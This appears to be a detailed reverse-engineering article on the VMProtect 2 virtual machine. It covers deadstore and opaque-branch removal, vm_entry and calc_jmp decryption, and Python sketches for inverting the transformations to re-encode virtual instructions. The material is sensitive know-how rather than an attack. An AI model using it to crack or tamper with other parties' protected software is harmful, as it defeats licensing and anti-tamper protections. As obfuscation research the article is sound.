WRITECR3 — Write Control Register Three
PUSHVSP — Push Virtual Stack Pointer
PUSHVSPQ — Push Virtual Stack Pointer QWORD
PUSHVSPDW — Push Virtual Stack Pointer DWORD
PUSHVSPW — Push Virtual Stack Pointer WORD
LVSP — Load Virtual Stack Pointer
LVSPW — Load Virtual Stack Pointer Word
LVSPDW — Load Virtual Stack Pointer DWORD
LRFLAGS — Load RFLAGS
JMP — Virtual Jump Instruction
CALL — Virtual Call Instruction
Significant Virtual Machine Signatures — Static Analysis
Locating VM Handler Table
Locating VM Handler Table Entry Decryption
Handling Transformations — Templated Lambdas and Maps
Extracting Transformations — Static Analysis Continued
Static Analysis Dilemma — Static Analysis Conclusion
vmtracer — Tracing Virtual Instructions
vmprofile-cli — Static Analysis Using Runtime Traces
Displaying Trace Information — vmprofiler-qt
Virtual Machine Behavior
Demo — Creating and Inspecting A Virtual Trace
Altering Virtual Instruction Results
Encoding Virtual Instructions — Inverse Transformations
Conclusion — Static Analysis, Dynamic Analysis
Credit — Links to Existing Work
Samuel Chevet
Inside VMProtect 2
Inside VMProtect 2 Slides
Rolf Rolles
Unpacking Virtualization Obfuscators
VMProtect 2 — Reverse Engineering
Anatoli Kalysch
VMAttack IDA PRO Plugin
Can Bölük
VTIL (Virtual-machine Translation Intermediate Language)
NoVmp — A static devirtualizer for VMProtect x64 3.x powered by VTIL.
Katy Hearthstone
VMProtect Control Flow Obfuscation (Case study: string algorithm cryptanalysis in Honkai Impact 3rd)
IRQL0
Helped create vmprofiler v1.0 and helped with general analysis of the vm handlers.
BTBD
Providing an algorithm to handle deadstore removal with Zydis.
Preamble — Intentions and Purpose
Before diving into this post I would like to state a few things regarding existing VMProtect 2 work, the purpose of this article, and my intentions, as these seem to become misconstrued and distorted at times.

Purpose
Although a lot of research has already been conducted on VMProtect 2, I feel there is still information which has not been discussed publicly, nor enough source code disclosed to the public. The information I am disclosing in this article aims to go beyond generic architectural analysis and much lower: to the level at which one could encode their own virtual machine instructions given a VMProtect’ed binary, as well as intercept and alter the results of virtual instructions with ease. The dynamic analysis discussed in this article is based upon existing work by Samuel Chevet; my dynamic analysis research and vmtracer project are simply an expansion upon the work demonstrated in his presentation “Inside VMProtect”.

Intentions
This post is not intending to cast any negative views upon VMProtect 2, the creator(s) of said software or anyone who uses it. I admire the creator(s) who clearly have impressive skills to create such a product.

This post has also been written under the assumption that everything discussed here has most likely been discovered by private entities, and that I am not the first to find or document these things about the VMProtect 2 architecture. I am not intending to present this information as though it is groundbreaking or something that no one else has already discovered, quite the opposite. This is simply a collection of existing information appended with my own research.

This being said, I humbly present to you, “VMProtect 2, Detailed Analysis of the Virtual Machine Architecture”.

Terminology
VIP — Virtual Instruction Pointer. This is equivalent to the x86-64 RIP register, which contains the address of the next instruction to be executed. VMProtect 2 uses the native register RSI to hold the address of the next virtual instruction; thus RSI is equivalent to VIP.

VSP — Virtual Stack Pointer. This is equivalent to the x86-64 RSP register, which contains the address of the stack. VMProtect 2 uses the native register RBP to hold the virtual stack pointer; thus RBP is equivalent to VSP.

VM Handler — A routine which contains the native code to execute a virtual instruction. For example, the VADD64 instruction adds two values on the stack together and stores the result as well as RFLAGS on the stack.

Virtual Instruction — Also known as “virtual bytecode”, these are the bytes interpreted and subsequently executed by the virtual machine. Each virtual instruction is composed of one or more operands; the first operand contains the opcode for the instruction.

Virtual Opcode — The first operand of every virtual instruction. This is the vm handler index. The size of a VMProtect 2 opcode is always one byte.

IMM / Immediate Value — A value encoded into a virtual instruction by which operations are to happen upon, such as loading said value onto the stack or into a virtual register. Virtual instructions such as LREG, SREG, and LCONST all have immediate values.

Transformations — The term “transform” used throughout this post refers specifically to the operations done to decrypt operands of virtual instructions and vm handler table entries. These transformations consist of xor, add, sub, inc, dec, not, neg, shl, shr, ror, rol, and lastly bswap. Transformations are done on sizes of 1, 2, 4, and 8 bytes. Transformations can also have immediate/constant values associated with them, such as “xor rax, 0x123456” or “add rax, 0x123456”.
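To make the transformation set concrete, here is a small Python model of these operations with proper wraparound at 1-, 2-, 4-, and 8-byte widths. This is my own illustrative sketch, not code from VMProtect; the operation names simply mirror the list above.

```python
MASKS = {1: 0xFF, 2: 0xFFFF, 4: 0xFFFFFFFF, 8: 0xFFFFFFFFFFFFFFFF}

def ror(v, n, size):
    bits = size * 8
    n %= bits
    return ((v >> n) | (v << (bits - n))) & MASKS[size]

def rol(v, n, size):
    return ror(v, -n % (size * 8), size)

def bswap(v, size):
    # reverse the byte order of a size-byte value
    return int.from_bytes(v.to_bytes(size, 'little'), 'big')

def apply(v, size, ops):
    """Apply a chain of transformations, e.g. [('not',), ('ror', 4)]."""
    m = MASKS[size]
    for op, *args in ops:
        if op == 'not':     v = ~v & m
        elif op == 'neg':   v = -v & m
        elif op == 'inc':   v = (v + 1) & m
        elif op == 'dec':   v = (v - 1) & m
        elif op == 'add':   v = (v + args[0]) & m
        elif op == 'sub':   v = (v - args[0]) & m
        elif op == 'xor':   v = v ^ args[0]
        elif op == 'shl':   v = (v << args[0]) & m
        elif op == 'shr':   v = v >> args[0]
        elif op == 'ror':   v = ror(v, args[0], size)
        elif op == 'rol':   v = rol(v, args[0], size)
        elif op == 'bswap': v = bswap(v, size)
    return v
```

Every transformation here is invertible, which is what makes re-encoding virtual instructions possible later on.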

Introduction
VMProtect 2 is a virtual-machine-based x86 obfuscator which converts x86 instructions into a RISC, stack-machine instruction set. Each protected binary has a unique set of encrypted virtual machine instructions with unique obfuscation. This project aims to disclose very significant signatures which are present in every single VMProtect 2 binary, with the intent of aiding further research. This article will also briefly discuss different types of VMProtect 2 obfuscation. All deobfuscation techniques described here are tailored specifically to virtual machine routines and will not work on generally obfuscated routines, specifically routines which have real JCC’s in them.

Obfuscation — Deadstore, Opaque Branching
VMProtect 2 mostly uses two types of obfuscation: the first being deadstore, and the second opaque branching. Throughout obfuscated routines you can see a few instructions followed by a JCC, then another set of instructions followed by another JCC. Another contributing part of opaque branching is random instructions which affect the FLAGS register. You can see these little buggers everywhere. They are mostly bit test instructions, useless compares, as well as set/clear flag instructions.

Opaque Branching Obfuscation Example
In this opaque branching example I will go over what VMProtect 2 opaque branching looks like, other factors such as the state of RFLAGS, and most importantly how to determine whether you are looking at an opaque branch or a legitimate JCC.

.vmp0:00000001400073B4 D0 C8 ror al, 1
.vmp0:00000001400073B6 0F CA bswap edx
.vmp0:00000001400073B8 66 0F CA bswap dx
.vmp0:00000001400073BB 66 0F BE D2 movsx dx, dl
.vmp0:00000001400073BF 48 FF C6 inc rsi
.vmp0:00000001400073C2 48 0F BA FA 0F btc rdx, 0Fh
.vmp0:00000001400073C7 F6 D8 neg al
.vmp0:00000001400073C9 0F 81 6F D0 FF FF jno loc_14000443E
.vmp0:00000001400073CF 66 C1 FA 04 sar dx, 4
.vmp0:00000001400073D3 81 EA EC 94 CD 47 sub edx, 47CD94ECh
.vmp0:00000001400073D9 28 C3 sub bl, al
.vmp0:00000001400073DB D2 F6 sal dh, cl
.vmp0:00000001400073DD 66 0F BA F2 0E btr dx, 0Eh
.vmp0:00000001400073E2 8B 14 38 mov edx, [rax+rdi]
Consider the obfuscated code above and notice the JNO branch. If you follow this branch in IDA and compare the instructions against the instructions after the JNO, you can see that the branch is useless, as both paths execute the same meaningful instructions.

loc_14000443E:
.vmp0:000000014000443E F5 cmc
.vmp0:000000014000443F 0F B3 CA btr edx, ecx
.vmp0:0000000140004442 0F BE D3 movsx edx, bl
.vmp0:0000000140004445 66 21 F2 and dx, si
.vmp0:0000000140004448 28 C3 sub bl, al
.vmp0:000000014000444A 48 81 FA 38 04 AA 4E cmp rdx, 4EAA0438h
.vmp0:0000000140004451 48 8D 90 90 50 F5 BB lea rdx, [rax-440AAF70h]
.vmp0:0000000140004458 D2 F2 sal dl, cl
.vmp0:000000014000445A D2 C2 rol dl, cl
.vmp0:000000014000445C 8B 14 38 mov edx, [rax+rdi]
If you look closely you can see that a few instructions are present in both branches. It can be difficult to determine which code is deadstore and which is required; however, if you select a register in IDA and look at all the places it is written to prior to the instruction you are looking at, you can remove all of those writing instructions up until there is a read of said register. Now, back to the example. In this case the following instructions are what matter:

.vmp0:0000000140004448 28 C3 sub bl, al
.vmp0:000000014000445C 8B 14 38 mov edx, [rax+rdi]
Generation of these opaque branches means there are duplicate instructions. Each code path also contains more deadstore obfuscation, as well as opaque conditions and other instructions that affect RFLAGS.

Deadstore Obfuscation Example
VMProtect 2’s deadstore obfuscation adds the most junk to the instruction stream, aside from the opaque bit tests and comparisons. These instructions serve no purpose and can be spotted and removed by hand with ease. Consider the following:

.vmp0:0000000140004149 66 D3 D7 rcl di, cl
.vmp0:000000014000414C 58 pop rax
.vmp0:000000014000414D 66 41 0F A4 DB 01 shld r11w, bx, 1
.vmp0:0000000140004153 41 5B pop r11
.vmp0:0000000140004155 80 E6 CA and dh, 0CAh
.vmp0:0000000140004158 66 F7 D7 not di
.vmp0:000000014000415B 5F pop rdi
.vmp0:000000014000415C 66 41 C1 C1 0C rol r9w, 0Ch
.vmp0:0000000140004161 F9 stc
.vmp0:0000000140004162 41 58 pop r8
.vmp0:0000000140004164 F5 cmc
.vmp0:0000000140004165 F8 clc
.vmp0:0000000140004166 66 41 C1 E1 0B shl r9w, 0Bh
.vmp0:000000014000416B 5A pop rdx
.vmp0:000000014000416C 66 81 F9 EB D2 cmp cx, 0D2EBh
.vmp0:0000000140004171 48 0F A3 F1 bt rcx, rsi
.vmp0:0000000140004175 41 59 pop r9
.vmp0:0000000140004177 66 41 21 E2 and r10w, sp
.vmp0:000000014000417B 41 C1 D2 10 rcl r10d, 10h
.vmp0:000000014000417F 41 5A pop r10
.vmp0:0000000140004181 66 0F BA F9 0C btc cx, 0Ch
.vmp0:0000000140004186 49 0F CC bswap r12
.vmp0:0000000140004189 48 3D 97 74 7D C7 cmp rax, 0FFFFFFFFC77D7497h
.vmp0:000000014000418F 41 5C pop r12
.vmp0:0000000140004191 66 D3 C1 rol cx, cl
.vmp0:0000000140004194 F5 cmc
.vmp0:0000000140004195 66 0F BA F5 01 btr bp, 1
.vmp0:000000014000419A 66 41 D3 FE sar r14w, cl
.vmp0:000000014000419E 5D pop rbp
.vmp0:000000014000419F 66 41 29 F6 sub r14w, si
.vmp0:00000001400041A3 66 09 F6 or si, si
.vmp0:00000001400041A6 01 C6 add esi, eax
.vmp0:00000001400041A8 66 0F C1 CE xadd si, cx
.vmp0:00000001400041AC 9D popfq
.vmp0:00000001400041AD 0F 9F C1 setnle cl
.vmp0:00000001400041B0 0F 9E C1 setle cl
.vmp0:00000001400041B3 4C 0F BE F0 movsx r14, al
.vmp0:00000001400041B7 59 pop rcx
.vmp0:00000001400041B8 F7 D1 not ecx
.vmp0:00000001400041BA 59 pop rcx
.vmp0:00000001400041BB 4C 8D A8 ED 19 28 C9 lea r13, [rax-36D7E613h]
.vmp0:00000001400041C2 66 F7 D6 not si
.vmp0:00000001400041CB 41 5E pop r14
.vmp0:00000001400041CD 66 F7 D6 not si
.vmp0:00000001400041D0 66 44 0F BE EA movsx r13w, dl
.vmp0:00000001400041D5 41 BD B2 6B 48 B7 mov r13d, 0B7486BB2h
.vmp0:00000001400041DB 5E pop rsi
.vmp0:00000001400041DC 66 41 BD CA 44 mov r13w, 44CAh
.vmp0:0000000140007AEA 4C 8D AB 31 11 63 14 lea r13, [rbx+14631131h]
.vmp0:0000000140007AF1 41 0F CD bswap r13d
.vmp0:0000000140007AF4 41 5D pop r13
.vmp0:0000000140007AF6 C3 retn
Let’s start from the top, one instruction at a time. The first instruction, at 0x140004149, is “RCL — Rotate Left Carry”. This instruction affects the FLAGS register as well as DI. Let’s see the next time DI is referenced: is it a read or a write? The next reference to DI is the NOT instruction at 0x140004158. NOT both reads and writes DI, so far both instructions are valid. The next instruction that references DI is the POP at 0x14000415B. This is critical, as all writes to RDI prior to this POP can be removed from the instruction stream.

.vmp0:000000014000414C 58 pop rax
.vmp0:000000014000414D 66 41 0F A4 DB 01 shld r11w, bx, 1
.vmp0:0000000140004153 41 5B pop r11
.vmp0:0000000140004155 80 E6 CA and dh, 0CAh
.vmp0:000000014000415B 5F pop rdi
The next instruction is POP RAX at 0x14000414C. RAX is never written to throughout the entire instruction stream; it is only read from. Since it has a read dependency, this instruction cannot be removed. Moving on to the next instruction, SHLD (double precision shift left) has a write dependency on R11 and a read dependency on BX. The next instruction that references R11 is POP R11 at 0x140004153, so we can remove the SHLD instruction as it’s deadstore.

.vmp0:000000014000414C 58 pop rax
.vmp0:0000000140004153 41 5B pop r11
.vmp0:0000000140004155 80 E6 CA and dh, 0CAh
.vmp0:000000014000415B 5F pop rdi
Now just repeat the process for every single instruction. The end result should look something like this:

.vmp0:000000014000414C 58 pop rax
.vmp0:0000000140004153 41 5B pop r11
.vmp0:000000014000415B 5F pop rdi
.vmp0:0000000140004162 41 58 pop r8
.vmp0:000000014000416B 5A pop rdx
.vmp0:0000000140004175 41 59 pop r9
.vmp0:000000014000417F 41 5A pop r10
.vmp0:000000014000418F 41 5C pop r12
.vmp0:000000014000419E 5D pop rbp
.vmp0:00000001400041AC 9D popfq
.vmp0:00000001400041B7 59 pop rcx
.vmp0:00000001400041CB 41 5E pop r14
.vmp0:00000001400041DB 5E pop rsi
.vmp0:0000000140007AF4 41 5D pop r13
.vmp0:0000000140007AF6 C3 retn
This method is not perfect for removing deadstore obfuscation, as there is a second POP RCX which is missing from the result above. POP and PUSH instructions are special cases which should never be removed from the instruction stream, as these instructions also change RSP. This method for removing deadstore is also only applied to vm_entry and vm handlers; it cannot be applied to generically obfuscated routines as-is. Again, this method is NOT going to work on any obfuscated routine. It’s specifically tailored for vm_entry and vm handlers, as these routines have no legitimate JCC’s in them.
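The manual process above can be sketched as a tiny backward pass over the instruction stream: walking from the bottom up, keep an instruction only if it is a stack operation or if a register it writes is read later before being overwritten. The Python below is my own toy model under heavy assumptions (registers are pre-canonicalized strings, sub-register aliasing like DI/RDI is not resolved, and flag-only instructions such as CMP are simply dropped), not a production deobfuscator.

```python
def strip_deadstore(insns):
    """insns: list of (text, reads, writes, is_stack_op) tuples,
    where reads/writes are sets of canonical register names."""
    live = set()   # registers read further down the stream
    kept = []
    for text, reads, writes, is_stack_op in reversed(insns):
        # keep stack ops unconditionally (they also change RSP),
        # and any instruction whose written register is still read
        if is_stack_op or (writes & live):
            kept.append(text)
            live -= writes   # this write satisfies the later reads
            live |= reads    # its own source registers must stay live
    kept.reverse()
    return kept

# miniature version of the article's example stream
example = [
    ("rcl di, cl",       {"di", "cl"},   {"di"},   False),
    ("pop rax",          set(),          {"rax"},  True),
    ("shld r11w, bx, 1", {"r11w", "bx"}, {"r11w"}, False),
    ("pop r11",          set(),          {"r11"},  True),
    ("not di",           {"di"},         {"di"},   False),
    ("pop rdi",          set(),          {"rdi"},  True),
]
```

Running `strip_deadstore(example)` leaves only the three POPs, matching the hand-cleaned result shown above.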

Overview — VMProtect 2 Virtual Machine
Virtual instructions are decrypted and interpreted by virtual instruction handlers referred to as “vm handlers”. The virtual machine is a RISC-based stack machine with scratch registers. Prior to vm_entry, an encrypted RVA (relative virtual address) to the virtual instructions is pushed onto the stack, followed by all general purpose registers and RFLAGS. The VIP is decrypted, calculated, and loaded into RSI. A rolling decryption key is then started in RBX and is used to decrypt every single operand of every single virtual instruction. The rolling decryption key is updated by transforming it with each decrypted operand value.

Rolling Decryption
VMProtect 2 uses a rolling decryption key. This key is used to decrypt virtual instruction operands, which subsequently prevents any sort of hooking: if any virtual instructions are executed out of order, the rolling decryption key becomes invalid, causing all further decryption of virtual operands to be invalid.
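A minimal Python model of the rolling key mechanics might look like this. It assumes the first transformation is an XOR (the actual operation varies per build) and takes the three middle transformations as callables; the point it illustrates is that the key update reuses the first transformation with the operands swapped, so replaying instructions out of order desynchronizes the key.

```python
def decrypt_operand(enc, key, transforms, size=1):
    """Sketch of VMProtect 2 operand decryption, assuming the
    build-specific key transform is an XOR."""
    m = (1 << size * 8) - 1
    v = (enc ^ key) & m        # first transform uses the rolling key
    for t in transforms:       # three build-specific transforms
        v = t(v) & m
    new_key = (key ^ v) & m    # key update: same transform, operands swapped
    return v, new_key
```

Decrypting the same operand twice, or skipping one, leaves `new_key` out of sync with the stream, and every subsequent operand decrypts to garbage.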

Native Register Usage
During execution inside of the virtual machine, some native registers are dedicated to virtual machine mechanisms such as the virtual instruction pointer and the virtual stack. In this section I will discuss these native registers and their uses in the virtual machine.

Non-Volatile Registers — Registers With Specific Usage
To begin, RSI is always used for the virtual instruction pointer. Operands are fetched from the address stored in RSI. The initial value is loaded into RSI by vm_entry.

RBP is used for the virtual stack pointer; the address stored in RBP is actually native stack memory. RBP is loaded with RSP prior to the allocation of scratch registers. This brings us to RDI, which points to the scratch registers. The address in RDI is also initialized in vm_entry and is set to an address landing inside of the native stack.

R12 is loaded with the linear virtual address of the vm handler table. This is done inside of vm_entry and throughout the entire duration of execution inside of the virtual machine R12 will contain this address.

R13 is loaded with the linear virtual address of the module base address inside of vm_entry and is not altered throughout execution inside of the virtual machine.

RBX is a very special register which contains the rolling decryption key. After every decryption of every operand of every virtual instruction RBX is updated by applying a transformation to it with the decrypted operand’s value.

Volatile Registers — Temp Registers
RAX, RCX, and RDX are used as temporary registers inside of the virtual machine; however, RAX is used for very specific temporary operations over the other registers. RAX is used to decrypt operands of virtual instructions, and AL specifically is used when decrypting the opcode of a virtual instruction.

vm_entry — Entering The Virtual Machine
vm_entry is a very significant component to the virtual machine architecture. Prior to entering the VM, an encrypted RVA to virtual instructions is pushed onto the stack. This RVA is a four byte value.

.vmp0:000000014000822C 68 FA 01 00 89 push 0FFFFFFFF890001FAh
After this value is pushed onto the stack, a JMP to vm_entry is executed. vm_entry is subjected to the obfuscation which I explained in great detail above. By flattening and then removing deadstore code we can get a nice clean view of vm_entry.

0x822c : push 0xFFFFFFFF890001FA
0x7fc9 : push 0x45D3BF1F
0x48e4 : push r13
0x4690 : push rsi
0x4e53 : push r14
0x74fb : push rcx
0x607c : push rsp
0x4926 : pushfq
0x4dc2 : push rbp
0x5c8c : push r12
0x52ac : push r10
0x51a5 : push r9
0x5189 : push rdx
0x7d5f : push r8
0x4505 : push rdi
0x4745 : push r11
0x478b : push rax
0x7a53 : push rbx
0x500d : push r15
0x6030 : push [0x00000000000018E2]
0x593a : mov rax, 0x7FF634270000
0x5955 : mov r13, rax
0x5965 : push rax
0x596f : mov esi, [rsp+0xA0]
0x5979 : not esi
0x5985 : neg esi
0x598d : ror esi, 0x1A
0x599e : mov rbp, rsp
0x59a8 : sub rsp, 0x140
0x59b5 : and rsp, 0xFFFFFFFFFFFFFFF0
0x59c1 : mov rdi, rsp
0x59cb : lea r12, [0x0000000000000AA8]
0x59df : mov rax, 0x100000000
0x59ec : add rsi, rax
0x59f3 : mov rbx, rsi
0x59fa : add rsi, [rbp]
0x5a05 : mov al, [rsi]
0x5a0a : xor al, bl
0x5a11 : neg al
0x5a19 : rol al, 0x05
0x5a26 : inc al
0x5a2f : xor bl, al
0x5a34 : movzx rax, al
0x5a41 : mov rdx, [r12+rax*8]
0x5a49 : xor rdx, 0x7F3D2149
0x5507 : inc rsi
0x7951 : add rdx, r13
0x7954 : jmp rdx
As expected, all registers as well as RFLAGS are pushed to the stack. The last push puts eight bytes of zeros on the stack, not a relocation as I first expected. The order in which these pushes happen is unique per-build; however, the last push of eight zeros is always the same throughout all binaries. This is a very stable signature for determining where the general register pushes end. Below is the exact sequence of instructions I am referring to in this paragraph.

0x48e4 : push r13
0x4690 : push rsi
0x4e53 : push r14
0x74fb : push rcx
0x607c : push rsp
0x4926 : pushfq
0x4dc2 : push rbp
0x5c8c : push r12
0x52ac : push r10
0x51a5 : push r9
0x5189 : push rdx
0x7d5f : push r8
0x4505 : push rdi
0x4745 : push r11
0x478b : push rax
0x7a53 : push rbx
0x500d : push r15
0x6030 : push [0x00000000000018E2] ; pushes 0’s
After all registers and RFLAGS are pushed onto the stack, the base address of the module is loaded into R13. This happens in every single binary; R13 always contains the base address of the module during execution of the VM. The base address of the module is also pushed onto the stack.

0x593a : mov rax, 0x7FF634270000
0x5955 : mov r13, rax
0x5965 : push rax
Next, the relative virtual address of the virtual instructions to be executed is decrypted. This is done by loading the 32-bit RVA into ESI from [RSP+0xA0]. This is a very significant signature and can be found trivially. Three transformations are then applied to ESI to produce the decrypted RVA of the virtual instructions. The three transformations are unique per-binary; however, there are always exactly three.

0x596f : mov esi, [rsp+0xA0]
0x5979 : not esi
0x5985 : neg esi
0x598d : ror esi, 0x1A
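The three transformations shown above (not, neg, ror 0x1A) are specific to this sample, but each one is trivially invertible, which is how one could compute the encrypted RVA to push for arbitrary virtual instructions. A hedged Python sketch, mirroring this sample's chain:

```python
M32 = 0xFFFFFFFF

def ror32(v, n):
    n %= 32
    return ((v >> n) | (v << (32 - n))) & M32

def decrypt_vip_rva(enc):
    """Replays this sample's three transformations on ESI."""
    v = ~enc & M32      # not esi
    v = -v & M32        # neg esi
    return ror32(v, 0x1A)  # ror esi, 0x1A

def encrypt_vip_rva(rva):
    """Inverse: apply the opposite operations in reverse order."""
    v = ((rva << 0x1A) | (rva >> (32 - 0x1A))) & M32  # rol undoes ror
    v = -v & M32        # neg is its own inverse
    return ~v & M32     # not is its own inverse
```

Since every build uses a different (but always invertible) chain, only the three operations and their constants need to be swapped out per target.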
The next notable operation is the allocation of stack space for the scratch registers. RSP is always moved into RBP, then RSP is subtracted by 0x140 and aligned to 16 bytes. After this is done, the resulting address is moved into RDI. During execution of the VM, RDI always contains a pointer to the scratch registers.

0x599e : mov rbp, rsp
0x59a8 : sub rsp, 0x140
0x59b5 : and rsp, 0xFFFFFFFFFFFFFFF0
0x59c1 : mov rdi, rsp
The next notable operation is loading the address of the vm handler table into R12. This is done on every single VMProtect 2 binary. R12 always contains the linear virtual address of the vm handler table. This is yet another significant signature which can be used to find the location of the vm handler table quite trivially.

0x59cb : lea r12, [0x0000000000000AA8]
Another operation is then done on RSI to calculate VIP. Inside of the PE headers there is a header called the “optional header”, which contains an assortment of information. One of its fields is called “ImageBase”. If any bits above bit 31 are set in this field, those bits are added to RSI. For example, the vmptest.vmp.exe ImageBase field contains the value 0x140000000, thus 0x100000000 is added to RSI as part of the calculation. If an ImageBase field contains a value that fits in 32 bits, zero is added to RSI.

0x59df : mov rax, 0x100000000
0x59ec : add rsi, rax
After this addition is done to RSI, a small and somewhat insignificant-looking instruction is executed: RSI is copied into RBX. Now, RBX has a very special purpose: it contains the “rolling decryption” key. As you can see, the first value loaded into RBX is going to be the address of the virtual instructions themselves! Not the linear virtual address, but the RVA plus the top 32 bits of the ImageBase field.

0x59f3 : mov rbx, rsi
Next, the base address of the vmp module is added to RSI, computing the full linear virtual address of the virtual instructions. Remember that RBP contains the value of RSP prior to the allocation of scratch space, and the base address of the module is on the top of the stack at this point.

0x59fa : add rsi, [rbp]
This concludes the details of vm_entry. The next part of this routine is referred to as “calc_jmp” and is executed after every single virtual instruction besides the vm_exit instruction.

calc_jmp — Decryption Of Vm Handler Index
calc_jmp is part of the vm_entry routine; however, it is referenced by more than just vm_entry. Every single vm handler eventually jumps to calc_jmp (besides vm_exit). This snippet of code is responsible for decrypting the opcode of every virtual instruction, indexing into the vm handler table, decrypting the vm handler table entry, and jumping to the resulting vm handler.

0x5a05 : mov al, [rsi]
0x5a0a : xor al, bl
0x5a11 : neg al
0x5a19 : rol al, 0x05
0x5a26 : inc al
0x5a2f : xor bl, al
0x5a34 : movzx rax, al
0x5a41 : mov rdx, [r12+rax*8]
0x5a49 : xor rdx, 0x7F3D2149
0x5507 : inc rsi
0x7951 : add rdx, r13
0x7954 : jmp rdx
The first instruction of this snippet reads a single byte from RSI, which, as you know, is VIP. This byte is an encrypted opcode; in other words, it’s an encrypted index into the vm handler table. There are five transformations in total. The first transformation is always applied to the encrypted opcode with the value in RBX as the source. This is the “rolling encryption” at play. It’s important to note that the first value loaded into RBX is the RVA of the virtual instructions, thus BL will contain the last byte of this RVA.

0x5a05 : mov al, [rsi]
0x5a2f : xor bl, al ; transformation is unique to each build
Next, three transformations are applied to AL directly. These transformations can have immediate values; however, another register’s value is never mixed into these transformations.

0x5a11 : neg al
0x5a19 : rol al, 0x05
0x5a26 : inc al
The last transformation is applied to the rolling encryption key stored in RBX. It is the same transformation as the first, except the registers swap places. The end result is the decrypted vm handler index. The value of AL is then zero-extended into the rest of RAX.

0x5a2f : xor bl, al
0x5a34 : movzx rax, al
Now that the index into the vm handler table has been decrypted, the vm handler entry itself must be fetched and decrypted. There is only a single transformation applied to these vm handler table entries, and no register values are ever used in it. The register into which the encrypted vm table entry is loaded is always RCX or RDX.

0x5a41 : mov rdx, [r12+rax*8]
0x5a49 : xor rdx, 0x7F3D2149
VIP is now advanced. VIP can advance either forwards or backwards, and the advancement operation itself can be an LEA, INC, DEC, ADD, or SUB instruction.

0x5507 : inc rsi
Lastly, the base address of the module is added to the decrypted vm handler RVA and a JMP is executed to start executing the vm handler routine. Again, RDX or RCX is always used for this ADD and JMP. This is another significant signature in the virtual machine.

0x7951 : add rdx, r13
0x7954 : jmp rdx
This concludes the calc_jmp code snippet. As you can see, there are some very significant signatures which can be found trivially using Zydis, especially the decryption done on vm handler table entries and the fetching of these encrypted values.
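Putting the pieces together, the whole of calc_jmp can be modeled in a few lines of Python. The specific transformations (neg / rol 5 / inc), the table-entry XOR key 0x7F3D2149, and the forward VIP advancement all come from this particular sample and will differ per build; the structure, however, is constant.

```python
def calc_jmp(vip_bytes, vip, key, handler_table, base):
    """Model of this sample's calc_jmp: decrypt the opcode byte,
    update the rolling key (held in the low byte, i.e. BL), then
    decrypt the handler table entry and compute the jump target."""
    al = vip_bytes[vip] ^ (key & 0xFF)        # xor al, bl (first transform)
    al = -al & 0xFF                           # neg al
    al = ((al << 5) | (al >> 3)) & 0xFF       # rol al, 5
    al = (al + 1) & 0xFF                      # inc al
    key = (key & ~0xFF) | ((key ^ al) & 0xFF) # xor bl, al (key update)
    entry = handler_table[al] ^ 0x7F3D2149    # decrypt table entry
    return base + entry, vip + 1, key         # jmp target, new VIP, new key
```

Feeding this a dump of the 256-entry handler table and the virtual bytecode stream would let a tracer follow the VM handler by handler.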

vm_exit — Leaving The Virtual Machine
Unlike vm_entry, vm_exit is quite a straightforward routine. It simply POPs all registers back into place, including RFLAGS. There are some redundant POPs used to clear the module base, padding, and RSP off of the stack, since they are not needed. The order in which the pops occur is the inverse of the order in which the registers were pushed by vm_entry. The return address is calculated and loaded onto the stack prior to the vm_exit routine.

.vmp0:000000014000635F 48 89 EC mov rsp, rbp
.vmp0:0000000140006371 58 pop rax ; pop module base off the stack
.vmp0:000000014000637F 5B pop rbx ; pop zeros off the stack
.vmp0:0000000140006387 41 5F pop r15
.vmp0:0000000140006393 5B pop rbx
.vmp0:000000014000414C 58 pop rax
.vmp0:0000000140004153 41 5B pop r11
.vmp0:000000014000415B 5F pop rdi
.vmp0:0000000140004162 41 58 pop r8
.vmp0:000000014000416B 5A pop rdx
.vmp0:0000000140004175 41 59 pop r9
.vmp0:000000014000417F 41 5A pop r10
.vmp0:000000014000418F 41 5C pop r12
.vmp0:000000014000419E 5D pop rbp
.vmp0:00000001400041AC 9D popfq
.vmp0:00000001400041B7 59 pop rcx ; pop RSP off the stack.
.vmp0:00000001400041BA 59 pop rcx
.vmp0:00000001400041CB 41 5E pop r14
.vmp0:00000001400041DB 5E pop rsi
.vmp0:0000000140007AF4 41 5D pop r13
.vmp0:0000000140007AF6 C3 retn
check_vsp — Relocate Scratch Registers
Vm handlers which put new values onto the stack have a stack check after the handler executes. This routine checks whether the stack is encroaching upon the scratch registers.

.vmp0:00000001400044AA 48 8D 87 E0 00 00 00 lea rax, [rdi+0E0h]
.vmp0:00000001400044B2 48 39 C5 cmp rbp, rax
.vmp0:000000014000429D 0F 87 5B 17 00 00 ja calc_jmp
.vmp0:00000001400042AC 48 89 E2 mov rdx, rsp
.vmp0:0000000140005E5F 48 8D 8F C0 00 00 00 lea rcx, [rdi+0C0h]
.vmp0:0000000140005E75 48 29 D1 sub rcx, rdx
.vmp0:000000014000464C 48 8D 45 80 lea rax, [rbp-80h]
.vmp0:0000000140004655 24 F0 and al, 0F0h
.vmp0:000000014000465F 48 29 C8 sub rax, rcx
.vmp0:000000014000466B 48 89 C4 mov rsp, rax
.vmp0:0000000140004672 9C pushfq
.vmp0:000000014000467C 56 push rsi
.vmp0:0000000140004685 48 89 D6 mov rsi, rdx
.vmp0:00000001400057D6 48 8D BC 01 40 FF FF FF lea rdi, [rcx+rax-0C0h]
.vmp0:00000001400051FC 57 push rdi
.vmp0:000000014000520C 48 89 C7 mov rdi, rax
.vmp0:0000000140004A34 F3 A4 rep movsb
.vmp0:0000000140004A3E 5F pop rdi
.vmp0:0000000140004A42 5E pop rsi
.vmp0:0000000140004A48 9D popfq
.vmp0:0000000140004A49 E9 B0 0F 00 00 jmp calc_jmp
Note the usage of “movsb” which is used to copy the contents of the scratch registers.

Virtual Instructions — Opcodes, Operands, Specifications
Virtual instructions consist of one or more operands, the first operand being the opcode of the virtual instruction. Opcodes are 8-bit unsigned values which, when decrypted, are the index into the vm handler table. There can be a second operand, which is a one- to eight-byte immediate value.

All operands are encrypted and must be decrypted with the rolling decryption key. Decryption is done inside of calc_jmp as well as in the vm handlers themselves. Vm handlers that do decryption operate on immediate values only, never on an opcode.

Operand Decryption — Transformations
